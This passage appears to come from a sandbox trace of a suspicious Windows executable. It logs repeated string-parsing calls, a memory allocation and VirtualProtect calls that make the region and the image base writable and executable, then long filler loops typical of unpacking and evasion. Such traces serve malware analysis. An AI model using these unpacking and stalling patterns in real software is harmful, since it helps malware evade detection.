(in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.977] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.978] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.978] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.978] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.978] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.979] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.979] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.979] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.979] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.980] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.980] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.980] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.980] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0013.055] PathSkipRootW (pszPath="ꁏꁧ\\Teswes\\Temp[2].exe") returned 0x0 [0013.056] VirtualAlloc (lpAddress=0x0, dwSize=0x15000, flAllocationType=0x3000, flProtect=0x2) returned 0x210000 [0013.056] VirtualProtect (in: lpAddress=0x210000, dwSize=0x15000, flNewProtect=0x40, lpflOldProtect=0x18fbb4 | out: lpflOldProtect=0x18fbb4*=0x2) returned 1 [0013.058] VirtualProtect (in: lpAddress=0x400000, dwSize=0x15000, flNewProtect=0x40, lpflOldProtect=0x18fbb4 | out: lpflOldProtect=0x18fbb4*=0x2) returned 1 [0013.058] IsCharSpaceW (wch=0x38) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.058] IsCharAlphaW (ch=0x20) returned 0 [0013.058] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.059] IsCharAlphaW (ch=0x20) returned 0 [0013.059] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.060] IsCharAlphaW (ch=0x20) returned 0 [0013.060] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.061] IsCharAlphaW (ch=0x20) returned 0 [0013.061] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.062] IsCharAlphaW (ch=0x20) returned 0 [0013.062] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.063] IsCharAlphaW (ch=0x20) returned 0 [0013.063] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.064] IsCharAlphaW (ch=0x20) returned 0 [0013.064] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.065] IsCharAlphaW (ch=0x20) returned 0 [0013.065] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 0 [0013.066] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0013.066] IsCharAlphaW (ch=0x20) returned 